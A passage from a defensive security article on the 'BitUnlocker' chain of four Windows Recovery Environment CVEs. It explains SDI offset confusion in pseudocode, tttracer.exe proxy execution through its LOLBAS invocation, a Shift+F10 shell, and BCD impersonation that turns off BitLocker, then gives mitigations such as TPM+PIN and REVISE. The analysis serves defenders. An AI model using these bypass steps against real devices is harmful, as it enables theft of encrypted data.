const hash = sha256(sdi);              // integrity check sees ORIGINAL bytes
if (hash !== expectedHash) throw &quot;abort&quot;;&lt;/p&gt;
&lt;p&gt;const offset = readOffsetFromHeader(sdi); // attacker-controlled in malicious SDI
const wim = sdi.slice(offset);            // points PAST the hashed region
executeWim(wim);                          // runs appended malicious WIM&lt;/p&gt;
&lt;p&gt;// Lesson: the hashed range and the executed range are not the same range.
// The fix in KB5062553 binds them so that execution can only target
// bytes that the integrity hash actually covered.
`}&lt;/p&gt;
&lt;p&gt;Once the malicious WinRE is running, it inherits the BitLocker auto-unlock state from the boot context. The encrypted volume is now mountable. The remaining three CVEs are about what an attacker can do &lt;em&gt;from within&lt;/em&gt; WinRE that the original threat model did not expect WinRE to enable.&lt;/p&gt;
&lt;h3&gt;5.2 CVE-2025-48800 -- tttracer.exe as a proxy executor&lt;/h3&gt;
&lt;p&gt;WinRE&apos;s Offline Scanning operation invokes antivirus tooling from within the recovery environment. The set of trusted binaries WinRE will execute during scan is enumerated in &lt;code&gt;ReAgent.xml&lt;/code&gt; -- WinRE&apos;s app-registry equivalent -- and includes Microsoft-signed diagnostic utilities. Among them is &lt;code&gt;tttracer.exe&lt;/code&gt;, Microsoft&apos;s Time Travel Tracing debugger, included because it is occasionally invoked during diagnostics [@nvd-cve-2025-48800].&lt;/p&gt;
&lt;p&gt;&lt;code&gt;tttracer.exe&lt;/code&gt; is a proxy executor: by design, it launches an arbitrary process under tracing instrumentation. The LOLBAS project documents the exact invocation as &lt;code&gt;tttracer.exe {PATH_ABSOLUTE:.exe}&lt;/code&gt;, mapped to MITRE ATT&amp;amp;CK technique T1127, with the launched process running as a child of &lt;code&gt;tttracer.exe&lt;/code&gt; [@lolbas-tttracer]. Inside the WinRE auto-unlock boundary, with the live OS volume mounted, &quot;arbitrary process&quot; is the same primitive as &quot;shell on the cleartext volume.&quot; Combine an attacker-controlled &lt;code&gt;ReAgent.xml&lt;/code&gt; with &lt;code&gt;tttracer.exe&lt;/code&gt;&apos;s proxy-execution semantics and Offline Scanning becomes Offline Pwning.&lt;/p&gt;
&lt;p&gt;Time Travel Tracing is a Microsoft debugger most readers will not have seen named. It records process execution as a deterministic replayable trace and is a standard tool inside Microsoft&apos;s reliability engineering. Being on the WinRE trusted-app registry is a reasonable choice when the threat model is &quot;diagnose a broken boot,&quot; not &quot;an attacker is in the recovery environment.&quot;&lt;/p&gt;
&lt;h3&gt;5.3 CVE-2025-48003 -- SetupPlatform.exe and Shift+F10&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;SetupPlatform.exe&lt;/code&gt;, the Windows Setup host, remains on the WinRE trusted-app registry after upgrades and registers a Shift+F10 hotkey that opens &lt;code&gt;cmd.exe&lt;/code&gt;. The Shift+F10 chord has been a long-standing Windows Setup feature for OEM imaging and unattended diagnostics, where it is harmless because there is no encrypted volume mounted yet [@nvd-cve-2025-48003] [@hackacademy-bitunlocker].&lt;/p&gt;
&lt;p&gt;Inside WinRE, after auto-unlock has happened, Shift+F10 opens &lt;code&gt;cmd.exe&lt;/code&gt; &lt;em&gt;on the cleartext OS volume&lt;/em&gt;. STORM observed that manipulating the WinRE Apps Scheduled Operation entries in &lt;code&gt;ReAgent.xml&lt;/code&gt; creates an unbounded trigger window -- the hotkey stays armed long enough for an attacker to use it. The shell that opens has the privileges of SetupPlatform under WinRE, with the OS volume mounted underneath it.&lt;/p&gt;
&lt;h3&gt;5.4 CVE-2025-48818 -- BCD target-OS impersonation&lt;/h3&gt;
&lt;p&gt;The first three CVEs assume the attacker has gotten WinRE to boot. The fourth one closes the loop and turns the access from a privileged shell on the volume into an unconditional, persistent decryption -- without any further interaction.&lt;/p&gt;
&lt;p&gt;WinRE enumerates disk volumes in a specific order when deciding which Boot Configuration Data (BCD) store to consume as the description of the &quot;operating system to recover.&quot; STORM placed an attacker-controlled BCD store on the recovery partition that gets enumerated &lt;em&gt;before&lt;/em&gt; the legitimate one [@nvd-cve-2025-48818] [@hackacademy-bitunlocker]. WinRE treats the attacker volume as the trusted OS to recover, then invokes Push Button Reset with the &lt;code&gt;DecryptVolume&lt;/code&gt; directive -- a legitimate sub-operation of PBR that &lt;em&gt;disables&lt;/em&gt; BitLocker entirely. After Push Button Reset completes, BitLocker is not bypassed; it is &lt;em&gt;off&lt;/em&gt;.&lt;/p&gt;

A legitimate WinRE sub-operation invoked during recovery when the target volume must be fully decrypted before being re-imaged or returned to a clean state. The directive removes the BitLocker protectors and rewrites every sector of the volume in plaintext. When invoked by a legitimately-recovered OS, this is correct behavior. When invoked by an impersonated target-OS BCD entry, it is a permanent encryption removal.
&lt;h3&gt;5.5 The structural pattern&lt;/h3&gt;

flowchart TD
    subgraph WB[&quot;WinRE auto-unlock trust boundary&quot;]
        WP[&quot;Boot.sdi parser&quot;]
        RP[&quot;ReAgent.xml parser&quot;]
        BP[&quot;BCD store enumerator&quot;]
        TP[&quot;Trusted-app registry&quot;]
    end
    C1[&quot;CVE-2025-48804&lt;br /&gt;SDI offset confusion&quot;] --&amp;gt; WP
    C2[&quot;CVE-2025-48800&lt;br /&gt;tttracer.exe proxy&quot;] --&amp;gt; RP
    C2 --&amp;gt; TP
    C3[&quot;CVE-2025-48003&lt;br /&gt;SetupPlatform Shift+F10&quot;] --&amp;gt; RP
    C3 --&amp;gt; TP
    C4[&quot;CVE-2025-48818&lt;br /&gt;BCD impersonation&quot;] --&amp;gt; BP
    WB --&amp;gt; VMK[&quot;BitLocker VMK released&lt;br /&gt;to whatever runs inside&quot;]
&lt;p&gt;Four parsers; one boundary. The structural pattern reads:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every CVE attacks a different parser. Every parser sits inside the same auto-unlock trust boundary. Patching individual parsers does not close the boundary; it shrinks it. The boundary is the bug class.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; TPM bus sniffing fails against fTPM and Pluton because there is no exposed bus to sniff -- the seal is computed and released on-die. BitUnlocker does not attack the seal. The seal works exactly as designed: PCR 7 plus PCR 11 match the expected boot-chain measurements, and the TPM releases the VMK to the boot manager. The boot manager passes the unlock state into WinRE. WinRE then runs an attacker&apos;s code because one of its parsers had a bug. Nothing about fTPM or Pluton intervenes, because the entire attack is upstream of the silicon that the seal would protect.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft shipped patches for all four CVEs in KB5062553 on July 8, 2025 [@kb5062553]. The patches fixed the four code paths. They did not change the trust boundary. They did not, by themselves, even revoke the pre-patch boot manager that the chain depends on. To see what the July patches actually changed, and what they did not, we have to look at REVISE.&lt;/p&gt;
&lt;h2&gt;6. What KB5062553 changed, and what REVISE will&lt;/h2&gt;
&lt;p&gt;On the same Patch Tuesday that fixed BitUnlocker, Microsoft also reminded administrators that the Secure Boot certificate underwriting the entire Windows boot chain begins to expire in June 2026 [@kb5062553]. The two facts are not independent.&lt;/p&gt;
&lt;p&gt;KB5062553 closed the four BitUnlocker code paths inside the Windows 11 24H2 build 26100.4652 cumulative. The SDI parser was bound so that the integrity hash and the execution range now agree. The trusted-app registry semantics for &lt;code&gt;tttracer.exe&lt;/code&gt; and &lt;code&gt;SetupPlatform.exe&lt;/code&gt; were tightened so neither acts as a proxy executor inside WinRE. The BCD enumeration order was reworked so the recovery partition cannot present a target-OS impersonator before the legitimate one. Those are real fixes for real bugs.&lt;/p&gt;
&lt;p&gt;What KB5062553 did not change is the trust set. The pre-July-2025 &lt;code&gt;bootmgfw.efi&lt;/code&gt; is still signed under PCA 2011, and PCA 2011 is still in the Secure Boot &lt;code&gt;db&lt;/code&gt; on most fielded Windows devices. A physically present attacker can supply that old, signed, vulnerable boot manager from a USB stick. The firmware will load it. The four code paths are fixed in the new boot manager, but the old boot manager is still on the trust list. This is the same downgrade pattern that keeps Bitpixie exploitable [@neodyme-bitpixie-no-fix].&lt;/p&gt;
&lt;p&gt;The structural defence is REVISE, shipped under KB5025885 and the CVE-2023-24932 advisory [@kb5025885]. REVISE adds the Windows Production PCA 2011 signing certificate to the Secure Boot &lt;code&gt;dbx&lt;/code&gt;, which untrusts every boot manager signed by it, and ships a new UEFI CA 2023 certificate to replace the 2011 root. After REVISE deploys, the firmware refuses to load the pre-patch boot manager. The rollout is opt-in across multiple phases (currently five) because a &lt;code&gt;dbx&lt;/code&gt; update at fleet scale carries real brick risk: any device that ends up trying to boot a binary whose signing certificate has just been moved to the deny-list will not boot. KB5025885 explicitly warns that once the mitigation is enabled on a device, it cannot be reverted while Secure Boot remains on.&lt;/p&gt;

This lemma appears in three places already in this article -- Bitpixie, BlackLotus, and BitUnlocker -- and it is worth stating once explicitly.&lt;p&gt;A Microsoft-signed binary stays in the trust set as long as its signing certificate is in &lt;code&gt;db&lt;/code&gt; and neither its hash nor its signing certificate sits in &lt;code&gt;dbx&lt;/code&gt;. Microsoft can ship a code-path patch that supersedes the old binary, but nothing in the trust set changes automatically. The &lt;code&gt;dbx&lt;/code&gt; push is a separate operation, gated on a separate update, with its own opt-in semantics because pushing a wrong &lt;code&gt;dbx&lt;/code&gt; value bricks devices.&lt;/p&gt;
&lt;p&gt;The result is that &quot;the bug is patched in the latest cumulative&quot; and &quot;an attacker with physical presence can no longer load the vulnerable signed binary&quot; are not the same statement. The first is true after KB5062553. The second is true only after REVISE, only on devices where REVISE&apos;s dbx-revocation phase has run -- the phase that moves the PCA 2011 signing certificate into &lt;code&gt;dbx&lt;/code&gt; so the deny-list overrides the allow-list. The June 2026 PCA 2011 expiration is the natural backstop -- after that date, the certificate no longer signs anything new, and the migration completes on its own timetable.&lt;/p&gt;
&lt;p&gt;Until then, BitUnlocker&apos;s entry vector remains usable on every TPM-only device whose REVISE phase has not advanced.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;

flowchart LR
    A[&quot;Pre-July-2025 bootmgfw.efi&lt;br /&gt;(PCA 2011 signed)&quot;] --&amp;gt; B[&quot;KB5062553 patches&lt;br /&gt;the four CVEs in the NEW&lt;br /&gt;boot manager&quot;]
    A --&amp;gt; C[&quot;REVISE adds PCA 2011&lt;br /&gt;signing cert to dbx&quot;]
    B --&amp;gt; D[&quot;New devices: closed code paths&quot;]
    C --&amp;gt; E[&quot;Firmware refuses to load&lt;br /&gt;the vulnerable signed binary&quot;]
    D --&amp;gt; F[&quot;BitUnlocker fixed on patched device&quot;]
    E --&amp;gt; G[&quot;BitUnlocker entry vector blocked&lt;br /&gt;across the fleet&quot;]
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; PCA 2011 begins to expire in waves starting June 2026 [@kb5062553]. The UEFI CA 2023 migration must complete before then. Administrators of devices that have not yet reached REVISE&apos;s dbx-revocation phase should treat the June 2026 date as a hard deadline, not a goal: any device that misses the migration risks losing Secure Boot trust entirely on its next firmware update.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Patches close code paths. REVISE closes trust. Neither closes the WinRE auto-unlock surface itself. That is a different question, and the comparison Microsoft never likes to make is what other desktop operating systems chose to do about it.&lt;/p&gt;
&lt;h2&gt;7. How other platforms make the same trade-off&lt;/h2&gt;
&lt;p&gt;Windows is the only major desktop operating system that ships an auto-unlocking recovery environment on a TPM-sealed key. The other three -- macOS, ChromeOS, and Linux with LUKS -- make different choices at the same trade-off point. Looking at those choices shows what is actually possible.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Platform&lt;/th&gt;
&lt;th&gt;Recovery primitive&lt;/th&gt;
&lt;th&gt;Key availability during recovery&lt;/th&gt;
&lt;th&gt;Auto-unlock from physical-presence path&lt;/th&gt;
&lt;th&gt;Failure mode if compromised&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Windows + BitLocker + WinRE&lt;/td&gt;
&lt;td&gt;Push Button Reset, Startup Repair, Reset This PC&lt;/td&gt;
&lt;td&gt;VMK released by TPM, inherited by WinRE&lt;/td&gt;
&lt;td&gt;Yes -- Shift+Restart -&amp;gt; recovery menu&lt;/td&gt;
&lt;td&gt;BitUnlocker class: parser bugs leak the cleartext volume to attacker code running inside WinRE&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS + FileVault + macOS Recovery&lt;/td&gt;
&lt;td&gt;macOS Recovery (boot to recovery partition)&lt;/td&gt;
&lt;td&gt;Data Volume NOT mounted; user password or recovery key required&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Recovery cannot read user data without authentication&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ChromeOS + Verified Boot + Powerwash&lt;/td&gt;
&lt;td&gt;Recovery USB / &lt;code&gt;chrome://recovery&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;None -- recovery wipes user data&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Recovery destroys the protected data set&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux + LUKS / dm-crypt&lt;/td&gt;
&lt;td&gt;initramfs / rescue shell&lt;/td&gt;
&lt;td&gt;None -- every boot prompts for passphrase&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Recovery cannot proceed without passphrase&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Windows + BitLocker + WinRE is the only row in that table where the recovery environment can read user data without re-prompting the user. BitUnlocker is what the trade-off looks like once that property gets weaponised.&lt;/p&gt;
&lt;p&gt;macOS chose a different recovery model. FileVault encrypts the Data Volume; the signed System Volume Snapshot does not. macOS Recovery boots into the signed system volume and presents a Disk Utility view of the Data Volume that requires a user password or recovery key to mount. The recovery environment is &lt;em&gt;not&lt;/em&gt; given the keys. A macOS-side analogue of CVE-2025-48804 would still need to coerce Recovery into surfacing authentication UI -- the recovery primitive does not run with the user volume already mounted.&lt;/p&gt;
&lt;p&gt;ChromeOS chose the most aggressive recovery model. Verified Boot enforces signature chains all the way to the kernel; recovery from a corrupted state means powerwash, which wipes the user partition. There is no equivalent of WinRE that needs to read the encrypted volume. The trade-off is enforced by sacrificing the data, which is acceptable because user data on ChromeOS is mostly remote.&lt;/p&gt;
&lt;p&gt;LUKS / dm-crypt is the simplest model. Every boot, including recovery, prompts for the passphrase. There is no auto-unlock state to inherit. The trade-off is help-desk burden: a forgotten passphrase is a wiped drive. This is the model that the Microsoft Countermeasures page implicitly recommends for the &quot;skilled attacker with lengthy physical access&quot; threat tier when it suggests TPM+PIN [@ms-bitlocker-countermeasures].&lt;/p&gt;

Windows defines recovery as *transparent repair*. macOS defines it as *authenticated rebuild*. ChromeOS defines it as *wipe and restart*. LUKS defines it as *the same authentication you would do on a normal boot*. Each is internally consistent with the rest of its security model. None of them is wrong in isolation. They differ in what trade-off they make between fleet recoverability and recovery-environment exposure -- and BitUnlocker is what the most-usable-recovery choice costs.
&lt;p&gt;Recovery-key escrow to Microsoft Entra ID, Active Directory, or a local user account is a separate confidentiality boundary from the BitUnlocker surface. Forbes reported in January 2026 on a Guam FBI warrant served to Microsoft for BitLocker recovery keys, illustrating the legal-process pathway [@forbes-guam-bitlocker]. Different threat surface; same product.&lt;/p&gt;
&lt;p&gt;The trade-off Microsoft made in 2006 was the right one for a fleet that needs help-desk recoverability and the wrong one for a threat model with physical access. Eighteen years and seven attack generations later, the trade-off has not been revisited. The next section asks whether it can be.&lt;/p&gt;
&lt;h2&gt;8. Why patching cannot close the surface&lt;/h2&gt;
&lt;p&gt;In complexity theory, an impossibility result tells you what cannot be done no matter how hard you try. BitUnlocker is not that kind of result. It is the next thing over: a structural consequence of the threat model that no quantity of parser patches can close.&lt;/p&gt;
&lt;p&gt;State the recovery-versus-confidentiality dilemma carefully. &lt;em&gt;As long as a system auto-unlocks an encrypted volume for repair purposes without user-presence verification at the moment of recovery, the recovery environment&apos;s trust boundary equals the encryption&apos;s trust boundary.&lt;/em&gt; This is not a theorem in the published literature. It is the structural reading of the Microsoft Countermeasures threat-model tiers [@ms-bitlocker-countermeasures], and it follows almost mechanically from how the WinRE auto-unlock state is inherited.&lt;/p&gt;
&lt;p&gt;The dilemma admits exactly two engineering exits. The first is to deprecate WinRE auto-unlock and require a recovery key for every WinRE entry. Microsoft has not done this and will not do this, because the help-desk recoverability story collapses without it -- fleet administrators rely on WinRE entry being silent for routine repair. The second is to make TPM+PIN the default for non-Entra-enrolled devices, which forces a pre-boot human-presence check that WinRE structurally cannot satisfy. Microsoft has not done this either, presumably because of the help-desk cost of forgotten PINs at consumer scale.&lt;/p&gt;
&lt;p&gt;Until one of those two changes, the next BitUnlocker is a question of &lt;em&gt;when&lt;/em&gt;, not &lt;em&gt;whether&lt;/em&gt;. The four CVEs are an existence proof for the bug class &quot;Microsoft-signed binary on the WinRE trusted-app registry whose parsing of unsigned configuration data can be coerced.&quot; The cardinality of that bug class is not four. STORM found four. There are more.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; As long as a system auto-unlocks an encrypted volume for repair purposes without user-presence verification at the moment of recovery, the recovery environment&apos;s trust boundary equals the encryption&apos;s trust boundary. The bug class is not the parsers. The bug class is the boundary that contains them.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; You cannot have unattended recovery and confidentiality at the same time against an attacker with physical presence. Every desktop operating system that has tried has either added authentication to recovery (macOS) or has been broken at recovery (BitUnlocker, multiple times). The choice is a product decision, not a software bug.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft is not unaware of this. Quick Machine Recovery -- the cloud-orchestrated recovery primitive that reached general availability in 2025 -- extends the WinRE-equivalent surface rather than retracting it [@ms-qmr]. The trade-off pricing is ongoing. So is the audit.&lt;/p&gt;
&lt;p&gt;The next section is the question that follows from the boundary framing: what else is inside the boundary that STORM did not get to?&lt;/p&gt;
&lt;h2&gt;9. What STORM did not audit&lt;/h2&gt;
&lt;p&gt;STORM published four CVEs. The Windows Recovery Environment contains more than four parsers.&lt;/p&gt;
&lt;p&gt;Four open questions follow directly from the boundary framing:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The remaining WinRE trusted-app surface.&lt;/strong&gt; STORM exploited &lt;code&gt;tttracer.exe&lt;/code&gt; and &lt;code&gt;SetupPlatform.exe&lt;/code&gt;. The WinRE Apps Scheduled Operation in &lt;code&gt;ReAgent.xml&lt;/code&gt; registers other Microsoft-signed binaries. None of those binaries was written under the assumption that an attacker would be the one calling them with the OS volume mounted. How many similar inheritances remain unaudited is unknown, and the population is the unstated denominator of every subsequent BitUnlocker-class CVE.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PCA 2011 trust on most fielded devices.&lt;/strong&gt; Until REVISE deploys at fleet scale, the pre-July-2025 &lt;code&gt;bootmgfw.efi&lt;/code&gt; remains chain-loadable on any device that still trusts PCA 2011. The June 2026 PCA 2011 expiration is the structural milestone [@kb5062553]. Between mid-2025 and mid-2026, the BitUnlocker entry vector is a deployment question, not a code question.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quick Machine Recovery extending the WinRE-equivalent surface.&lt;/strong&gt; Cloud-orchestrated recovery on encrypted volumes occupies the same trust boundary as WinRE -- by design, since the point of QMR is to do silent fleet repair on devices that cannot reach a desk [@ms-qmr]. No published security audit comparable to STORM&apos;s BitUnlocker work has appeared for QMR. The next BitUnlocker-shaped CVE may live there.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pluton hardware bypass.&lt;/strong&gt; No published practical hardware attack on Pluton exists in the open literature as of mid-2026. The SCRT/Compass-class TPM+PIN bypasses are limited to discrete-TPM hardware where the bus between CPU and TPM is exposed [@scrt-tpm-pin] [@compass-2024] [@ms-pluton]. Whether Pluton admits decapping, laser-fault-injection, or microarchitectural side-channel attacks is an open question that nobody outside Microsoft and a handful of three-letter agencies has the budget to answer at scale.&lt;/p&gt;
&lt;p&gt;Quick Machine Recovery&apos;s 2025 general availability puts it inside the BitUnlocker disclosure timeline [@ms-qmr]. Microsoft is expanding the WinRE-equivalent attack surface in the same calendar year that STORM is publishing the four CVEs.&lt;/p&gt;
&lt;p&gt;And one orthogonal question that every BitLocker survey is asked: who has the recovery key? A serious defender has to think about the recovery-key escrow surface too -- see below.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Cloud escrow of the BitLocker recovery key is a confidentiality surface that BitUnlocker does not touch. BitUnlocker is a parser-level chain that gives a physically-present attacker the cleartext volume without ever needing the recovery key. The keyholder question is orthogonal. Both surfaces exist; both are worth thinking about; neither closes the other.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The open-problems list above is what is unaudited as of mid-2026. The actionable question -- &lt;em&gt;what do I, as an administrator, do tomorrow?&lt;/em&gt; -- is the subject of the next section.&lt;/p&gt;
&lt;h2&gt;10. Six things defenders should do this week&lt;/h2&gt;
&lt;p&gt;If you administer a Windows fleet, six concrete actions change the threat model. They are listed here in priority order, not severity order. The first one is the structural mitigation; the others are patch hygiene around it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Enable TPM+PIN.&lt;/strong&gt; The PowerShell-equivalent invocation is &lt;code&gt;manage-bde -protectors -add C: -tpmandpin&lt;/code&gt; [@ms-manage-bde]. This is the only mitigation that changes the threat model independently of patch state -- it forces a pre-boot human-presence check that WinRE structurally cannot satisfy. The honest trade-off: users forget PINs and help-desk burden goes up. The honest counterpoint: the recommendation has been in the Microsoft Countermeasures page in some form since Vista, and BitUnlocker is what eighteen years of ignoring it has produced [@ms-bitlocker-countermeasures].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;manage-bde -protectors -add C: -tpmandpin&lt;/code&gt; -- one PowerShell command, one PIN per user, one threat model permanently changed. This defeats Bitpixie, BitUnlocker, and any future BitUnlocker-class attack that lives upstream of the TPM seal. It does not defeat hardware TPM+PIN bus-sniff attacks on discrete TPMs [@scrt-tpm-pin] [@compass-2024], which are a separate class.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;2. Apply KB5062553 or any later cumulative.&lt;/strong&gt; The July 8, 2025 cumulative closes the four BitUnlocker code paths [@kb5062553]. By the time you read this, several later cumulatives have shipped; deploy the latest. This addresses the post-entry portion of the chain but not the entry vector.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Deploy REVISE / migrate Secure Boot to UEFI CA 2023.&lt;/strong&gt; This is the dbx-side defence that revokes the pre-patch &lt;code&gt;bootmgfw.efi&lt;/code&gt; [@kb5025885]. Until REVISE has run on a device, &quot;patched&quot; is not &quot;revoked.&quot; The deployment is opt-in across multiple phases (currently five) because a bad &lt;code&gt;dbx&lt;/code&gt; push at scale bricks devices; the June 2026 PCA 2011 expiration is the hard deadline.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. Restrict WinRE access where the threat model permits.&lt;/strong&gt; On kiosks, lab machines, lights-out servers, and other devices where there is no fleet-recovery requirement, &lt;code&gt;reagentc /disable&lt;/code&gt; closes the WinRE entry surface entirely. This costs you Push Button Reset and Startup Repair on those devices, which is acceptable for devices that are re-imaged centrally [@hackacademy-bitunlocker].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. Harden the firmware delivery surface.&lt;/strong&gt; Enable Secure Boot, set a firmware password, disable USB and PXE boot in firmware on devices that are not expected to be re-imaged in the field [@hackacademy-bitunlocker]. This closes the delivery vector independently of the WinRE patch state. It does nothing against an attacker who can boot from internal disk, which is why this is one of six items rather than the first one.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;6. Surface BitLocker protection state in management telemetry.&lt;/strong&gt; Intune, Microsoft Defender for Endpoint, and Entra ID can all report on whether a device has a TPM-only or TPM+PIN protector and whether the CVE-2023-24932 dbx revocation has applied (the per-device Secure Boot dbx update status field surfaced in Intune / Defender for Endpoint). Make those fields first-class in your fleet dashboards. PIN-on / PIN-off and dbx-revoked / not-revoked should both be visible at the fleet level, not buried inside a per-device drill-down.&lt;/p&gt;
&lt;p&gt;{`
// Logical equivalent of: manage-bde -protectors -get C:
// Run this against the parsed output to confirm the
// device is using TPM+PIN rather than TPM-only.&lt;/p&gt;
&lt;p&gt;function classifyProtectors(protectorTypes) {
  const hasPIN = protectorTypes.includes(&apos;TpmPin&apos;) ||
                 protectorTypes.includes(&apos;TpmPinStartupKey&apos;);
  const hasTPM = protectorTypes.some((t) =&amp;gt; t.startsWith(&apos;Tpm&apos;));
  if (!hasTPM) return &apos;NoTPM -- not in scope of BitUnlocker&apos;;
  if (hasPIN)  return &apos;TPM+PIN -- defeats BitUnlocker entry vector&apos;;
  return &apos;TPM-only -- vulnerable to BitUnlocker entry vector&apos;;
}&lt;/p&gt;
&lt;p&gt;// Example: the default Windows 11 consumer configuration
console.log(classifyProtectors([&apos;Tpm&apos;, &apos;RecoveryPassword&apos;]));
// -&amp;gt; &quot;TPM-only -- vulnerable to BitUnlocker entry vector&quot;
`}&lt;/p&gt;

If you genuinely cannot deploy TPM+PIN (kiosks running unattended, OT workloads, accessibility-driven exemptions), the partial mitigation stack is REVISE&apos;s dbx-revocation phase + firmware password + USB/PXE disabled in firmware + Kernel DMA Protection. Together these close the BitUnlocker entry vector on the patched code paths *and* the downgrade path *and* the firmware delivery channel. None of them changes the WinRE auto-unlock boundary -- only TPM+PIN does that -- so the next BitUnlocker-class CVE may still be exploitable on these devices until the corresponding patch ships. Treat this stack as a temporary mitigation, not a permanent answer.
&lt;p&gt;None of these are new recommendations. The pre-boot PIN line in particular has been in the Microsoft Countermeasures page in some form since Vista [@ms-bitlocker-countermeasures]. What has changed is the operational consequence of not following it. BitUnlocker is what the consequence looks like today.&lt;/p&gt;
&lt;h2&gt;11. Frequently asked questions&lt;/h2&gt;
&lt;p&gt;BitUnlocker has produced a predictable list of misconceptions. Each question below names a common misconception about BitUnlocker and gives the correct framing -- because the wrong answers are where threat models get built quietly.&lt;/p&gt;

Yes against both -- the attack is upstream of the TPM seal, so the bus-elimination property of fTPM and Pluton does not help here. See §5.5 for the full mechanism and the contrast with TPM bus sniffing, which *does* fail against fTPM and Pluton because there is no exposed bus to sniff.

No. BitUnlocker was *patched* on July 8, 2025 in KB5062553 [@kb5062553]. It was *disclosed* at Black Hat USA 2025 and DEF CON 33 in early August 2025, with the Microsoft Security Blog write-up published August 13 to 14, 2025 [@ms-bitunlocker]. Coordinated disclosure timelines mean the patch ships before the talk. Useful date to remember: KB5062553 = fix, August 2025 = public technical detail.

Only against an attacker who cannot chain-load the pre-July-2025 `bootmgfw.efi`. Until REVISE / KB5025885 is deployed on a given device, the old signed boot manager remains trusted [@kb5025885] and the BitUnlocker entry vector remains usable from a USB stick. The patch closes the code paths in the new boot manager; the dbx update closes the old one&apos;s trust. They are different operations on different schedules.

Yes against the BitUnlocker CVE class. A pre-boot PIN forces a human-presence check that WinRE structurally cannot satisfy from a boot-time recovery context. The Compass Security and SCRT TPM+PIN bypasses [@compass-2024] [@scrt-tpm-pin] are a separate, hardware-physical class that targets the bus between CPU and discrete TPM; they do not apply to fTPM or Pluton. For a TPM+PIN on Pluton or fTPM, none of the published attacks in this article succeed.

No. The chain uses Microsoft-signed binaries throughout. The pre-patch `bootmgfw.efi` is Microsoft-signed under PCA 2011. `tttracer.exe`, `SetupPlatform.exe`, and the WinRE binaries inside the trust boundary are all Microsoft-signed. The bug class is logic flaws in the parsing of *unsigned data* (Boot.sdi, ReAgent.xml, BCD) by signed binaries. Secure Boot is doing exactly what it is designed to do; the boundary it enforces is not the boundary BitUnlocker crosses.

No. Bitpixie scavenges the VMK from RAM via a soft-reboot bug in the pre-patch `bootmgfw.efi` (CVE-2023-21563, discovered August 2022 by Rairii, disclosed February 2023) [@neodyme-bitpixie]. BitUnlocker boots a malicious WinRE that inherits auto-unlock on the live volume. The shared structural pattern is that both are upstream of the TPM seal, both are defeated by TPM+PIN, and both work against fTPM and Pluton. The mechanism is different; the lesson is identical.

STORM is the *Security Testing and Offensive Research at Microsoft* team -- Microsoft&apos;s internal red team. Alon Leviev, one of the BitUnlocker co-authors, also disclosed Windows Downdate at Black Hat USA 2024 [@safebreach-downdate]. The Downdate research showed that the Windows update pipeline could be coerced into installing older, vulnerable code paths. BitUnlocker is a different mechanism by the same researcher, one year later, on the recovery pipeline rather than the update pipeline.
&lt;p&gt;The Shift+Restart chord ships in every copy of Windows. The recommendation that defeats it -- enable a pre-boot PIN -- has been on the Microsoft Countermeasures page since Vista. STORM&apos;s contribution is not that they found four bugs. It is that they made what happens when the recommendation is ignored impossible to look away from. The next move is the reader&apos;s.&lt;/p&gt;

To defend against malicious reset attacks, BitLocker uses the TCG Reset Attack Mitigation, also known as MOR bit. -- Microsoft Learn, BitLocker Countermeasures [@ms-bitlocker-countermeasures]
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;bitunlocker-microsoft-just-bypassed-its-own-bitlocker&quot; keyTerms={[
  { term: &quot;TPM-only protector&quot;, definition: &quot;Default BitLocker mode that releases the VMK on boot-chain measurement match alone, with no pre-boot human presence check.&quot; },
  { term: &quot;Volume Master Key (VMK)&quot;, definition: &quot;Key-encrypting key that wraps the FVEK; sealed by the TPM to a PCR profile.&quot; },
  { term: &quot;Windows Recovery Environment (WinRE)&quot;, definition: &quot;Bootable image based on Windows PE that inherits BitLocker auto-unlock during legitimate recovery.&quot; },
